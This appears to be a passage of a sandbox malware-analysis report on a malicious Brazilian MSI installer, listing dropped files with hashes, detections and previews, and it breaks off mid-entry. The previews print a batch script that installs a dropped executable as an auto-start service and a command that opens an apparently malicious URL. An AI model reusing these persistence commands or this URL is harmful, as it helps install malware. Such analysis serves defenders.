                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):208
                                                                      Entropy (8bit):4.9888662594672
                                                                      Encrypted:false
                                                                      SSDEEP:3:QaYJbseKDDktbrXj18BIDQK1ERNLw2ABOA53kfNINAgAEFWREX6EEDQobhL3T18l:Q7ApwFDJRku4NfIOc/Q3RVPRbj5QZ
                                                                      MD5:B3556F43ECD5512261B5A78C1C35E49A
                                                                      SHA1:6ECE39500BC03E88C10C258781EDC44A7AF97531
                                                                      SHA-256:9D410086A915681BD3FA4C5BC211C0BD7E2C9B2209CB26A125C2B9A3DDFCE15F
                                                                      SHA-512:02C4300E07EE33E74228F9CA55CBBF4BC140FA1F696C7C94B9DF522B18F2DE0992F0AAD79D4CF464FE236CB43D9292664E78C20BFDC5FC11A727475527B65214
                                                                      Malicious:false
                                                                      Preview:..&cls......@echo off..REM --- Criar o servi.o ---..sc create MeuServico binPath= "%USERPROFILE%\Pictures\fotosdaviagem\windows10.exe" start= auto..REM --- Iniciar o servi.o ---..sc start MeuServico....exit

                                                                      C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):13351424
                                                                      Entropy (8bit):7.958676117497988
                                                                      Encrypted:false
                                                                      SSDEEP:393216:QT60WQMRXhaxTxgT878o1AZWgGyjO61ahtTA:0WQ+xOgTUHOWgGyjOmahp
                                                                      MD5:320D46099BCDEECF45E6A030329C1BE8
                                                                      SHA1:DB9CDA17512C03B1375CD012BE005724CCF6A774
                                                                      SHA-256:D412F849A0B31754F92F8AAA721087394B34AB55B9A26E3349970229496613E2
                                                                      SHA-512:56439CD67FC95D295BF8857B16492BBA12C61EC1EB65C6EE1EEF95C5D633D863530AE7CD989F041CB1C2543AFA0C7F04262352C8574F3946CA62CE16B51CDEB8
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 49%
                                                                      • Antivirus: Virustotal, Detection: 34%, Browse
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....FQd..................-.........2)".......-...@...........................m......................................0l.&-..\.j.......m.......................m............................................................ ........................text.....-......................... ..`.itext........-..................... ..`.data....x....-.....................@....bss.....X...@...........................idata..`8..........................@....didata.l...........................@....edata..&-..........................@..@.rdata..E.... /.....................@..@.Hm8.....r..0/..................... ..`.?#3...............................@....F~x....p........................... ..`.rsrc.........m.....................@..@.reloc........m.....................@..B..................... 4......n3.............@..@........................................................

                                                                      C:\Users\user\Pictures\fotosdaviagem\cdburner.md

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16156854
                                                                      Entropy (8bit):7.999987454770361
                                                                      Encrypted:true
                                                                      SSDEEP:393216:b3jVMSUmx4twho2HfoWAN+d+Gstcdq5Z92/72X4o/o:LjGo4tMfFItcUn92xo/o
                                                                      MD5:697FF336A8F1278BEBD9FA3358BAE2BA
                                                                      SHA1:39514D8961C976B25E803A8EDF65AF1928D2CD2E
                                                                      SHA-256:918DE41CB24F5BE5A473B2D0881FEE5D56869640742F37466CBCAF5FD154E9CE
                                                                      SHA-512:32F943FEA634E6FB0C0B2D4E934FC671838611CEB9068840C6E7CE99036E06BE94E88B38256AC57729DF1983E0B5DC1474F7458CA32EF371B0D84077656FBDAF
                                                                      Malicious:false
                                                                      Preview:r/.fn...W.k........W.&r..r}.....B.N......N8..#.%..s..\A?.(am.|..x).....=.3}SzIU..9.R...Q.V....'.f-^..@..... .e\l7..[%.]r..N\....9.z.V...}o....I.....?B......e%.=...x.@..+U..4.U..R...j(b..9...C.o.#U.w..U!F.18......M]......D..*'Zx....n3.....Ql..U=B..,..q/..0mC...~..n....:..4. /.@.$...q|..>.fd3.u.E.X..I.........T.............s@..[/f.x:^..F*..?.).}pnx._..=...n......J..{x7...Z!F.hat....@4g.<..!=..Q9..F.E5...V~.B.1$...\.``=....;A...#.ab.3#ZA%.....S.<".@@T(@H.0.a..G`B..o..{$a1.%_......x.Q..)C....^.r..%i.,O\r..#...a.p....<...N...!6.4.r..Is.W.(..:6..........St..(..%...C..f`ZR..+.zK....."d..FwL..TR...]8.9...3.HX>;@m.v&+'.....r.)*...`n.Z...."..7;.N........wJ.*1....g..........V."....(7u.M..,o..z.R.&..w.v4.U./..V.b.\.o.z.M.i7.L.e...,U.S+.v6.P...`.w .PB.f.......j..,.:.C\...Fc..:...`:=.X......26.......G^..l.`..f.....[...x...6...v....Y.c..M.U..]k..1..).&...@...].bf.....@. .pZ.0.(.}...k...1.....:.d]L../.~.V>|qQ..t.5.>I#..>....<l...g..@]...k9kF.,!.."%h...z

                                                                      C:\Users\user\Pictures\fotosdaviagem\cdburnerConnect

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):54
                                                                      Entropy (8bit):5.245447224305563
                                                                      Encrypted:false
                                                                      SSDEEP:3:3ugfKvpkPxBKS9Gr236TOf:+giveJr9Upg
                                                                      MD5:51C2C6285991EF6126010B102782B43D
                                                                      SHA1:9CAEC981404A3BAD4536CB42DE557EB1CFECB085
                                                                      SHA-256:3692E5F68D8F5D3A8A3782FAAC232D89C74E37ED8E9EF2853AEE0147E4D2659C
                                                                      SHA-512:9C99EE675E9D3F9320DEFF79F23B062B2E563C5E1824089DA4825F25E8F8A87E0E870758EDAA4610C78F850EA2355886CE5F30DE51C1536F8713E9045999D48E
                                                                      Malicious:false
                                                                      Preview:jn8r4IjEzoJLa1cjTx5vc2C9Sk3Ff7+76/nuToKOtShN..oKPv+W/D

                                                                      C:\Users\user\Pictures\fotosdaviagem\cont.cmd

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65
                                                                      Entropy (8bit):4.2783947909316655
                                                                      Encrypted:false
                                                                      SSDEEP:3:jhR014fMJLLE2LGK3GJMuhyVY1QVn:jH0Sf2LIK3GJM+yVY1QV
                                                                      MD5:57206556AB8C8F1DEBC669EB402C61FD
                                                                      SHA1:1F202DF2A747136DB478FF2DD01186BCEE277963
                                                                      SHA-256:EEFDBE469C26F89006BE2E921DFBC27175F531A071FF3B095DD156499BAA1882
                                                                      SHA-512:CEA554FA22FA1E9B86B77E315896A31B3B59065F41B459FE93B8B26F879970AC741C96FD17605698A0DB520AD09DB8192FE34F82D033B8E759FD6F4ED7F8E4A4
                                                                      Malicious:false
                                                                      Preview:Start https://winrarbrasil.from-mn.com/clientes/inspecionando.php

                                                                      C:\Users\user\Pictures\fotosdaviagem\settings.xml

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1793
                                                                      Entropy (8bit):7.888051089019235
                                                                      Encrypted:false
                                                                      SSDEEP:48:PCSBPCF4qYtOIt9Oxi0/1YapmAg7VZNPVs:PvCFxYzmxN3mAYNS
                                                                      MD5:FEBE516EE835A50D940B2413596527C4
                                                                      SHA1:E38B8178C37973A7E43F1EE183F08FCFFFAEC5AC
                                                                      SHA-256:2E62CCA2526CD1355D85F607DCD274F05C808DB6AD9FCA42DC9371A30DB52652
                                                                      SHA-512:C719989A043475CFC1CDF3EBAE5E27DC721F025279F7EB3F3E1FA52D1A0F440214F77986EC4D18BFE1FFC6905C512198DBA0A0299D1FE7EDA66BD0E7205E772F
                                                                      Malicious:false
                                                                      Preview:..5....\..).X.rBA..F..3^,..p.U%#O.5....q.a..U.G.......o....5...*....&O.:....T..z...d.....[.....k.8S....0..{W$HP.b2&E....u..x..,l[T.0]..Q.[*..X_,7`...m.@....@...u....r..E....P.:[.{.\.X..&>..r._ue..Y.......^....x... 4\.u.....D-...v.z.M...1.q..j.....9*a'...Y..fL)...,442$pw .|7mu....$.s..od..Bl.....@...qo.#.....n.!.I....*B.a.DA...sv.>.;..$D....`c....TiI%.-..h.>..6}]e..7..y?.5...10W13.,]&^U\.O.).a.9.s..).4*.h...LV..z9..0...F.M......S{..~.rki....Q..&.#.f3....Ob......(...m...B.Q...m.p..W....zj.=..J.6.8....t..6.......R.,m...<(m.J....1.....g...j..a........,.._....P...t.....K..|~D.%.8.zLC{...P.....{W.U..z:.k........U..D@....Q....T.V....p..Mo..B.)#.'...nu:..o....o..H..j.X.........6... (wq.K. ..K.@.....I.fK..a.4..P.wcS.... .b..'C7....ha..3.S..(.fH'.(.Jj.;...Wq8..c........7.{.7.E..-l.t.!.P.6..&:...r7.-z...|Pm.8.6.~..L..r.Z.A.o*Q......@.L...q.2 %..f.G.^...S...A/.Q.n..Rq..".VQG!..n..[:X>..5....v.L.c..zc.F.Y.p..m..>.+9..G...,g6.U..;B)..Mp.....H?F....k.\.co|....

                                                                      C:\Users\user\Pictures\fotosdaviagem\windows10.exe

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1626280
                                                                      Entropy (8bit):7.371352775782398
                                                                      Encrypted:false
                                                                      SSDEEP:49152:H4jyNKd2Bqc8Y7IDbauSVGDzhGjThGDzhmj8L5NsmK2:H4Fd2Bqc8Y7IDbauSVGDzhGjThGDzhmL
                                                                      MD5:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      SHA1:CF1BEEEC71ABBFBE8A6F47ABAAA6C1AF2FEE37DC
                                                                      SHA-256:585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
                                                                      SHA-512:AEAF1D2DA43584AE91EA032C59A945AB91F721CC3B5BB98C2C7096DFD8C728B4EBF735491E06E934B4B1C9F1CCC719F950AD6F45E212F638B52C7AF5EFCC18DB
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                      • Antivirus: Virustotal, Detection: 5%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious, Browse
                                                                      • Filename: arquivo.msi, Detection: malicious, Browse
                                                                      • Filename: z1Intimacao-eletronica.msi, Detection: malicious, Browse
                                                                      • Filename: Nota.msi, Detection: malicious, Browse
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@........................... .../... .......................p..p............................`......................................................CODE................................ ..`DATA....p...........................@...BSS......................................idata.../... ...0..................@....tls.........P.......0...................rdata.......`.......0..............@..P.reloc..p....p.......2..............@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................

                                                                      C:\Windows\Installer\6450d8.msi

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {A964743B-CAFF-41FA-9500-18A10960F691}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu May 30 18:43:02 2024, Number of Pages: 200
                                                                      Category:dropped
                                                                      Size (bytes):31430144
                                                                      Entropy (8bit):7.980096046762622
                                                                      Encrypted:false
                                                                      SSDEEP:786432:2n1stHfbfy4zTE8R0BPtznQ6rHSVx7Z7hSCyx/suqfh:5HfO4zTB8zQ6bSVx7IUu
                                                                      MD5:41EED8B68BB6DDF7BDD73D285109E460
                                                                      SHA1:6A83946536E41D65D8F52F8222A3235C9877FCF3
                                                                      SHA-256:A477E01F4AFEAEE40323A6981773AB20F7405C013F6A0398C9126E73D057616A
                                                                      SHA-512:86C89A543B15D57F68852189C488F5C806841D6F4947F4B30B4EDDC76A19EB9B00675B9B6B7A781457010A368DAF23760235BABF6BCB1281B98CDFCC59E1844D
                                                                      Malicious:false
                                                                      Preview:......................>.......................................................G.......c.......v...............................P...Q...R...S...T...U...V...W...X...........................................................................................................................................................................................................................................................................................................................................................................=...................$...5....................................................................................... ...!..."...#...,...%...&...'...(...)...*...+...-.......3.../...0...1...2...6...4...>...A...7...8...9...:...;...<...........?...@.......B...C...D...E...F...........I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                      C:\Windows\Installer\MSI55AB.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: HomeDesk.msi, Detection: malicious, Browse
                                                                      • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious, Browse
                                                                      • Filename: arquivo.msi, Detection: malicious, Browse
                                                                      • Filename: 25690.01808D.msi, Detection: malicious, Browse
                                                                      • Filename: fatKCMAGKKH.msi, Detection: malicious, Browse
                                                                      • Filename: SPMServer_2024.3.5.473.exe, Detection: malicious, Browse
                                                                      • Filename: SPMServer_2024.2.1.7.exe, Detection: malicious, Browse
                                                                      • Filename: SPMServer_2024.3.1.22.exe, Detection: malicious, Browse
                                                                      • Filename: Df.mes-25664.msi, Detection: malicious, Browse
                                                                      • Filename: FatRE012024.msi, Detection: malicious, Browse
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\MSI5723.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\MSI5762.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\MSI5783.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\MSI5820.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\MSI594A.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):856767
                                                                      Entropy (8bit):6.562135215687912
                                                                      Encrypted:false
                                                                      SSDEEP:24576:r/EEimJH6g7scSzMQDC5lfCn/EEimJH6g7scSzMQDC5lfCU:rOmJH6g7sJzM+C5ZC/OmJH6g7sJzM+Cz
                                                                      MD5:FABA8FE084F6302901800197DFA0914A
                                                                      SHA1:5C589D1FD18C33CFDD2CCECF38C6660025D4E14A
                                                                      SHA-256:60D3A89C5F13527C1ADF72090F4FD5B44F9FBDBA1EE132CCAAABC35D03EB1C5D
                                                                      SHA-512:A5D6D5023D54ED997B41A5274FC8F78CF690B45454913A87A20ADA710E6CFEE5BF83220E7B47F64D2AEC78DE3457F1FDB440B87C3B90364A4841ADBB5F604BF0
                                                                      Malicious:false
                                                                      Preview:...@IXOS.@.....@.h.X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..CrzA2u67LQ.msi.@.....@?....@.....@........&.{A964743B-CAFF-41FA-9500-18A10960F691}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@!....@.....@.]....&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}..C:\Users\user\Documents\.@.......@.....@.....@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}1.01:\Software\Microsoft\Aplicativo Windows\Version.@.......@.....@.....@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}..01:\Microsoft\.@.......@.....@.....@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}..01:\Microsoft\Windows\.@.......@.....@.....@......&.{4669957E-4874-4408-AF9D-19502B394F45}%.01:\Microsoft\Windows\CurrentVersion\.@.......@.....@.....@......&.{7FA8939

                                                                      C:\Windows\Installer\MSI5DCF.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):423936
                                                                      Entropy (8bit):6.554049394581909
                                                                      Encrypted:false
                                                                      SSDEEP:12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
                                                                      MD5:768B35409005592DE2333371C6253BC8
                                                                      SHA1:E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
                                                                      SHA-256:33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
                                                                      SHA-512:BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\MSI5DEF.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):423936
                                                                      Entropy (8bit):6.554049394581909
                                                                      Encrypted:false
                                                                      SSDEEP:12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
                                                                      MD5:768B35409005592DE2333371C6253BC8
                                                                      SHA1:E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
                                                                      SHA-256:33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
                                                                      SHA-512:BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\SourceHash{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.1640402021203538
                                                                      Encrypted:false
                                                                      SSDEEP:12:JSbX72FjbiAGiLIlHVRpZh/7777777777777777777777777vDHFLwQmIGit/l0G:JcQI5tBwQm6iF
                                                                      MD5:0CC4AC6470FD7B08EEF6FBA92F09A502
                                                                      SHA1:78E61571BAEB25846123554EA849F80F11DBBDE8
                                                                      SHA-256:B4619549A5FCD7E3ADC9A916AC49B74A8CEB32030D6FC376BEE89633B5EC8920
                                                                      SHA-512:5336E7046646EA81A96C7A8E33A123B2698F71FD7A38FEE56A3A21F94B636E17A4A04D0D08355F8D594E09EEAF3E11E5918C2DE87EFAAF113D02E76D18AE955A
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.4875809594755607
                                                                      Encrypted:false
                                                                      SSDEEP:48:U8PhYuRc06WXJ0FT5DBf7J5rISCrKAECiCyjMHoRrISCrAT:rhY13FTN57J1IrREC0M2Ir
                                                                      MD5:63900DFF48B423D3EEC328CB5353665D
                                                                      SHA1:F40D79495066948EA1F1FFB2C446DC44444B5965
                                                                      SHA-256:0263B405E39C9F3DBFA4BF7E3D6FAC7F35B6AAAAC5C041723CA234330A4D3F53
                                                                      SHA-512:D540D0283778C3A9C82FF113D5376B11E759B324BD4DC49C2986BE98A71911B7B1819D676B8880677C755CD5A27C6D31E9BC467BC558B61DD8053E606EAB8D4F
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
